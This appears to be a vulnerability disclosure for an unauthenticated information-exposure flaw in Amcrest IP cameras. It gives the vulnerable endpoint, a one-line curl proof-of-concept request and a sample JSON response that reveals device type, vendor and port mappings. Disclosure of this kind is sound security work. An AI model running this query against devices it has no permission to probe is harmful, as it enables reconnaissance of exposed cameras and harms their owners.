This report highlights an Information Disclosure vulnerability in multiple AMCREST IPC devices. The vulnerability is demonstrated by a lack of proper access control, allowing sensitive configuration data to be accessed through an unauthenticated HTTP request, affecting over 149,151 devices on the Internet.
CWE-200: Information Exposure
URI: http://[IP_address]/web_caps/webCapsConfig
Description: this endpoint returns detailed device information, including the device type, vendor, network configuration (IP addresses and port mappings), system capabilities, and software/plugin versions.
curl -X GET "http://[IP_address]/web_caps/webCapsConfig" -H "Accept: */*"
HTTP response example:
{
"Anonymous": false,
"HttpPort": {
"InnerPort": 80,
"OuterPort": 8080
},
"HttpsPort": {
"InnerPort": 443,
"OuterPort": 443
},
"RTSPPort": {
"InnerPort": 554
},
"deviceType": "IP2M-841W",
"eth0": {
"IPAddress": "",
"IPv6Address": ""
},
"eth2": {
"IPAddress": "",
"IPv6Address": ""
},
"vendor": "Amcrest",
...
}